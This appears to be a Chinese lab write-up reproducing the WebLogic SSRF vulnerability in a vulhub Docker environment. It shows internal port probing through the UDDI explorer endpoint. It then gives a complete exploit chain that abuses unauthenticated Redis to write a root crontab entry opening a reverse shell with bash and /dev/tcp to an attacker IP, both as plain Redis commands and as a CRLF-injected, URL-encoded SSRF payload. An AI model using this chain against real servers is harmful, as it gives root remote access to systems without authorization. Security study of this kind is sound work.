[漏洞复现]Weblogic SSRF漏洞复现

Weblogic SSRF漏洞复现

环境:vulhub/weblogic/ssrf

漏洞点

http://192.168.17.134:7001/uddiexplorer/SearchPublicRegistries.jsp

image-20210118184033204

通过抓包发现:

将此处替换为其他的地址可以有不同的回显。

例如:

http://127.0.0.1:7001

回显:

weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code (Not Found). Please ensure that your URL is correct, and the web service has deployed without error.

http://127.0.0.2:7001

回显:

weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '7002'

docker的weblogi环境地址(redis端口):172.19.0.2:6379

http://172.19.0.2:6379

image-20210118184945568

回显:
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.19.0.2:6379 which did not have a valid SOAP content-type: null.

可以判断此处存在SSRF漏洞。

image-20210118184144708

攻击点:redis数据未授权访问

未授权访问:访问数据库时不需要提供用户名与密码。

也就是说我们可以通过SSRF漏洞访问内网的redis数据库,利用redis数据库实现读写文件操作,然后将计划任务写进/etc/crontab文件,从而实现反弹shell。

通过三条命令将反弹shell脚本写入/etc/crontab:设置监听地址与端口

set 1 "\n\n\n\n* * * * * root bash  -i >& /dev/tcp/192.168.17.129/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

然后将这段命令进行url编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.17.129%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

然后进行拼接url地址,

http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.17.129%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

最后将其拼接到数据包中:

image-20210118194011743

在kali中开启监听:

image-20210118193621612

成功反弹shell。

补充

docker中的redis版本:

查看命令:docker exec -it your-redis-container-name-or-id redis-server -v

image-20210423171202826

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值